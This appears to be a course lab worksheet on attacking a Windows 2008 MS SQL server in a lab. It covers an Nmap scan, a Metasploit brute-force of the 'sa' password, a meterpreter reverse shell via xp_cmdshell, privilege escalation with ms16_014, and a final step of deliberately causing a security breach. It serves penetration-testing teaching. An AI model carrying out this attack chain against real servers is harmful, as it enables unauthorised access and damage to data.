|
1. Scan the network to check for MS SQL service
|
|
In this part, scan all computers in the network for MS SQL Server service (Port 1433). Use the service detection option you used last week.
Run the Nmap with the options described above and
take a screenshot(s) of the result that is showing that the port is open on Windows 2008.
Type the command here
|
|
2. Crack the sa password
|
|
sa is the most privileged account in an SQL server. This account is usually targeted by hackers, as you will do in this part. You will use Metasploit to crack the password of the sa account in this part.
|
|
Command
|
Notes
|
|
gunzip /usr/share/wordlists/rockyou.txt.gz
|
Decompress the password dictionary
|
|
msfconsole
|
Open Metasploit
|
|
search mssql_login
|
Find a relevant Metasploit module
|
|
Type the command here
|
Type in the required command
|
|
show options
|
See a list of available options. Confirm that the username option has already been set as "sa”. But you still need to set some options.
|
|
Type the command here
|
Set the remote host (SQL Server) to connect, and then the Metasploit module will try passwords remotely by brute-forcing
|
|
Type the command here
|
Check the username; if you see roo, you have to change it with the correct one
|
|
set pass_file /usr/share/wordlists/rockyou.txt
|
This is the password list (dictionary) you compressed. You will use this to crack the password.
|
|
set verbose false
|
Type in this command if you don't want to see a message for all failed login attempts.
|
|
run
|
Take a screenshot of the terminal window showing the password of the sa account.
Note: Take a note of this password; you will use it later on.
The completion of this command will take about 80 seconds.
|
|
3. Get a shell
|
|
In this part, you will try to get a shell from Windows 2008 using the xp_cmdshell procedure on MS SQL Server. xp_cmdshell is a dangerous and extended procedure that enables interaction between the MS SQL server and the operating system. You can run Windows commands from SQL server and perform operations like copying files, creating folders, and many others.
In this part, you will use a Metasploit payload that exploits xp_cmdshell to create a shell.
|
|
search mssql_payload
|
Search Metasploit for possible MS SQL payloads
|
|
use exploit/windows/mssql/mssql_payload
|
This is the Metasploit payload that uses the xp_cmdshell procedure on MS SQL Server
|
|
show options
|
See the possible options for this payload. By default, the username option has already been set as “sa”.
|
|
Type the command here
|
Did you see that the RHOSTS parameter is blank? Set it as Windows 2008 server. RPORT has already been set as 1433.
|
|
Type the command here
|
Set the password of the sa account you cracked in the previous part
|
|
set payload windows/x64/meterpreter/reverse_tcp
|
You have to set the payload option, although it has not been shown in the options list. This is a global option that applies mssql_payload exploit. Note that mssql_payload uses the xp_cmdshell procedure; however, it needs a mechanism to handle the MS SQL server traffic. This is similar to the analog RC car and RC remote control; remember from the Project-1.
|
|
Type the command here
|
You have to assign the local counterpart of the host.
|
|
set lport 443
|
You have to assign the local counterpart of the port number.
|
|
run or exploit
|
You should be getting a shell after running the exploit.
|
|
4. Confirm that the shell is low-privileged
|
|
Now try some commands to check your privilege level on the shell.
|
|
Commands
|
Notes
|
|
shell
|
Switch to Windows 2008 native shell
|
|
whoami
|
See the currently logged-on user name.
It is probably a low-privileged shell. Let’s try doing something that requires privileges.
|
|
Type the command here
|
Try to add a user account from the command line.
Take a screenshot of the terminal window showing the result.
|
|
Exit
|
Exit from the Window 2008 shell and return to meterpreter shell
|
|
5. Get a high-privileged shell
|
|
In this part, you will use the exploit suggester module to find some exploits for privilege escalation, and then use one of these exploits.
|
|
background
|
Don’t forget to note the id of the session
|
|
search suggester
|
This command is to search for the keyword “suggester” and find the correct name of the suggester module.set
|
|
Type the command here
|
Type in the correct command
|
|
show options
|
|
|
Type the command here
|
Write the correct command
|
|
run or exploit
|
Run exploit suggester, so that it will suggest some exploits to run on the low-privileged shell to get a high-privileged shell.
|
|
Type the command here
|
Use ms16_014_wmi_recv_notif.
Type in the correct command
|
|
show options
|
|
|
set session #
|
The same session ID should put here as the one you chose for the exploit suggester. Remember, you are trying the exploits suggested by the local_exploit_suggester.
|
|
run or exploit
|
After running the exploit, you should see the message "Exploit completed, but no session was created."
|
|
show options
|
This time you will see the options of the payload (reverse_shell_tcp)
|
|
Type the command here
|
Set the first option of the payload
|
|
Type the command here
|
Set the second option of the payload option
|
|
run or exploit
|
You should be getting a shell after running the exploit. You will see a Windows shell instead of a meterpreter shell. (Press enter once)
|
|
6. Confirm that the shell is high-privileged
|
|
Now check if you have the privilege to perform the dangerous actions.
|
|
whoami
|
Take a screenshot of the terminal window showing the username.
|
|
7. Gave rise to an information security breach
|
|
Type the command(s) here
|
Did something that will cause loss of confidentiality, integrity, or availability on the target system. Provide the details.
Take screenshots. Please perform anything other than you did in the Project-2. (Don’t create a user account)
|